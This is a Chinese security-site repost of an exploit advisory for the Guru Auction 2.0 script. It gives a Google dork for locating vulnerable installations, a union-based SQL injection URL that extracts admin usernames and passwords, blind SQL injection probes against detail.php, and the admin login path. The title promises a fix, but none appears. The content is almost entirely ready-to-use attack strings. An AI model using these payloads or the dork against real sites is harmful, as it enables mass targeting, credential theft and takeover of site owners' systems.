• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    Guru Auction 2.0多重sql注射及修复

    时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

     Guru Auction 2.0 Multiple SQL Injection Vulnerabilities

    作者     : v3n0m涛涛电脑知识

    应用 : Guru Auction 2.0涛涛电脑知识网

    Price       : $49

    Vendor      :

    Google Dork : inurl:subcat.php?cate_id=

     

    SQLi p0c:

    ~~~~~~~~~~

    [path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--

     

     

    盲注 p0c:

    ~~~~~~~~~~

    /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true

    [path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false

     

    管理登录入口:

    ~~~~~~~~~~

    [path]/admin/

     

     

  • 上一篇:WordPress Asset-Manager PHP文件上传漏洞及修复
  • 下一篇:发几个过D盾Web查杀/安全狗/护卫神的PHP免杀一句话
    • 相关文章
    • 没有相关文章
    共有评论 0相关评论
    发表我的评论
    • 大名:
    • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1